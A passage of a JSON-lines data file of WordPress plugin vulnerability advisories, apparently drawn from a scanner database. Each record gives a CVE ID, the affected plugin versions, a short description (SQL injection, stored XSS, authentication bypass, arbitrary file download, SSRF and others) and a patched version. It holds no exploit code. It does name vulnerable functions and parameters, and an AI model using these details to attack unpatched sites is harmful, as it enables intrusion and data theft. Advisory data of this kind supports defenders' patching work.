version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eucookielaw\\\/trunk\\\/templates\\\/EUCookieCache.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eucookielaw\\\/trunk\\\/templates\\\/EUCookieCache.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d360de79-8490-4e70-b2d9-4f01a1ed3305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d360de79-8490-4e70-b2d9-4f01a1ed3305?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5324","slug":"easy-login-woocommerce","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5665","slug":"easy-login-woocommerce","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u2018export_settings\u2019 function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary options on affected sites.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a304e9a-9518-4a6a-b36a-963cb329f5c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a304e9a-9518-4a6a-b36a-963cb329f5c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php?rev=3084943#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php?rev=3084943#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3495","slug":"country-state-city-auto-dropdown","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the \u2018cnt\u2019 and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dcacaf-0e2a-4bef-b944-fb7e43d25777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dcacaf-0e2a-4bef-b944-fb7e43d25777?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089374%40country-state-city-auto-dropdown%2Ftrunk&old=3068802%40country-state-city-auto-dropdown%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089374%40country-state-city-auto-dropdown%2Ftrunk&old=3068802%40country-state-city-auto-dropdown%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7133","slug":"mystickymenu","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any WordPress plugin before 2.7.3 does not validate and escape some of its settings before outputting them back in the page, which could allow users with a high role to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c81c1622-33d1-41f2-ba63-f06bd4c125ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c81c1622-33d1-41f2-ba63-f06bd4c125ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0371","slug":"jet-elements","versionImpact":"2.7.2.1","versionEndExcluding":"2.7.3","description":"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 2.7.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded2f366-375c-4cf6-9cbd-c969a3b3d6d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded2f366-375c-4cf6-9cbd-c969a3b3d6d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1549","slug":"ad-inserter","versionEndExcluding":"2.7.27","description":"The Ad Inserter WordPress plugin before 2.7.27 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c94b3a68-673b-44d7-9251-f3590cc5ee9e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c94b3a68-673b-44d7-9251-f3590cc5ee9e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3986","slug":"sportspress","versionImpact":"2.7.21","versionEndExcluding":"2.7.22","description":"The SportsPress WordPress plugin before 2.7.22 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76c78f8e-e3da-47d9-9bf4-70e9dd125b82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76c78f8e-e3da-47d9-9bf4-70e9dd125b82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5327","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.19","versionEndExcluding":"2.7.20","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018pp_animated_gradient_bg_color\u2019 parameter in all versions up to, and including, 2.7.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5618fdfc-636f-452b-80e1-5182b068d1c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5618fdfc-636f-452b-80e1-5182b068d1c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.19\\\/extensions\\\/animated-gradient-background.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.19\\\/extensions\\\/animated-gradient-background.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094253\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094253\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50889","slug":"beaver-builder-lite-version","versionEndExcluding":"2.7.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder \u2013 WordPress Page Builder allows Stored XSS. This issue affects Beaver Builder \u2013 WordPress Page Builder: from n\/a through 2.7.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/beaver-builder-lite-version\\\/wordpress-beaver-builder-plugin-2-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/beaver-builder-lite-version\\\/wordpress-beaver-builder-plugin-2-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4090","slug":"mystickymenu","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any WordPress plugin before 2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aedcb986-0f2b-4852-baf1-6cb61e83e109\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aedcb986-0f2b-4852-baf1-6cb61e83e109\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3520","slug":"country-state-city-auto-dropdown","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tc_csca_patch_settings function in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with subscriber access and above, to add states or cities to the dropdown.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ccd4a3-ea1f-49b3-b4ce-ab1e247e1f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ccd4a3-ea1f-49b3-b4ce-ab1e247e1f76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068802\\\/country-state-city-auto-dropdown\\\/trunk?contextall=1&old=2751425&old_path=%2Fcountry-state-city-auto-dropdown%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068802\\\/country-state-city-auto-dropdown\\\/trunk?contextall=1&old=2751425&old_path=%2Fcountry-state-city-auto-dropdown%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5438","slug":"tutor","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.7.1 via the 'attempt_delete' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Instructor-level access and above, to delete arbitrary quiz attempts.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec14d4-d97b-40b1-b61b-05e911f49bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec14d4-d97b-40b1-b61b-05e911f49bb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Quiz.php#L1806\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Quiz.php#L1806\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098465\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098465\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4902","slug":"tutor","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018course_id\u2019 parameter in all versions up to, and including, 2.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with admin access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00e8169-3b8f-44a0-9af2-e81777a913f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00e8169-3b8f-44a0-9af2-e81777a913f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L1936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L1936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3098465%40tutor%2Ftrunk&old=3086489%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3098465%40tutor%2Ftrunk&old=3086489%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1178","slug":"sportspress","versionEndExcluding":"2.7.18","description":"The SportsPress \u2013 Sports Club & League Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37977","slug":"wpfunnels","versionEndExcluding":"2.7.17","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPFunnels Team Drag & Drop Sales Funnel Builder for WordPress \u2013 WPFunnels plugin <=\u00a02.7.16 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpfunnels\\\/wordpress-wpfunnels-plugin-2-7-16-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpfunnels\\\/wordpress-wpfunnels-plugin-2-7-16-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1564","slug":"wp-schema-pro","versionImpact":"2.7.15","versionEndExcluding":"2.7.16","description":"The wp-schema-pro WordPress plugin before 2.7.16 does not validate post access allowing a contributor user to access custom fields on any post regardless of post type or status via a shortcode","recommendation":"Update to version 2.7.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ecb1e36f-9c6e-4754-8878-03c97194644d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ecb1e36f-9c6e-4754-8878-03c97194644d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1055","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.14","versionEndExcluding":"2.7.15","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/trunk\\\/modules\\\/buttons\\\/widgets\\\/buttons.php#L1544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/trunk\\\/modules\\\/buttons\\\/widgets\\\/buttons.php#L1544\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6984","slug":"powerpack-lite-for-elementor","versionEndExcluding":"2.7.14","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.13. This is due to missing or incorrect nonce validation in the powerpack-lite-for-elementor\/classes\/class-pp-admin-settings.php file. This makes it possible for unauthenticated attackers to modify and reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe2cfc96-63f4-4e4b-bf49-6031594a4805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe2cfc96-63f4-4e4b-bf49-6031594a4805?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015474%40powerpack-lite-for-elementor&new=3015474%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015474%40powerpack-lite-for-elementor&new=3015474%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12711","slug":"rsvp","versionImpact":"2.7.13","versionEndExcluding":"2.7.14","description":"The RSVP and Event Management plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX functions like bulk_delete_attendees() and bulk_delete_questions() in all versions up to, and including, 2.7.13. This makes it possible for unauthenticated attackers to delete questions and attendees and for authenticated users to update question menu orders.","recommendation":"Update to version 2.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216473%40rsvp&new=3216473%40rsvp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216473%40rsvp&new=3216473%40rsvp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d234212a-2019-477d-81d1-b2acc2321055?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d234212a-2019-477d-81d1-b2acc2321055?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1310","slug":"job-postings","versionImpact":"2.7.11","versionEndExcluding":"2.7.12","description":"The Jobs for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.7.11 via the 'job_postings_get_file' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.7.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-postings\\\/tags\\\/2.7.11\\\/include\\\/class-job-get-uploaded-file.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-postings\\\/tags\\\/2.7.11\\\/include\\\/class-job-get-uploaded-file.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257145%40job-postings&new=3257145%40job-postings&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257145%40job-postings&new=3257145%40job-postings&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/408312d3-9a9e-4b6b-9991-aee6b77745b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/408312d3-9a9e-4b6b-9991-aee6b77745b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10134","slug":"simple-backup","versionEndExcluding":"2.7.11","description":"The Simple Backup plugin for WordPress is vulnerable to Arbitrary File Download in versions up to, and including, 2.7.10 via the download_backup_file function. This is due to a lack of capability checks and file type validation. This makes it possible for attackers to download sensitive files such as the wp-config.php file from the affected site.","recommendation":"Update to version 2.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131919\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131919\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29482b70-0ff2-4bb1-9d41-9cffb83b5ad0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29482b70-0ff2-4bb1-9d41-9cffb83b5ad0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10105","slug":"job-postings","versionImpact":"2.7.10","versionEndExcluding":"2.7.11","description":"The Job Postings WordPress plugin before 2.7.11 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4477db12-26e9-4c6d-8b71-f3f6a0d19813\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4477db12-26e9-4c6d-8b71-f3f6a0d19813\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1909","slug":"buddyboss-platform-pro","versionImpact":"2.7.01","versionEndExcluding":"2.7.10","description":"The BuddyBoss Platform Pro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.01. This is due to insufficient verification on the user being supplied during the Apple OAuth authenticate request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 2.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/2-7-10\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/2-7-10\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cce9b8b-0589-4b09-b184-a66fc86fcb46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cce9b8b-0589-4b09-b184-a66fc86fcb46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6991","slug":"wp-file-get-contents","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The JSM file_get_contents() Shortcode WordPress plugin before 2.7.1 does not validate one of its shortcode's parameters before making a request to it, which could allow users with contributor role and above to perform SSRF attacks.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b92becb-8a47-48fd-82e8-f7641cf5c9bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b92becb-8a47-48fd-82e8-f7641cf5c9bc\",\"refsource\":\"\",\"tags\":[]}]"}
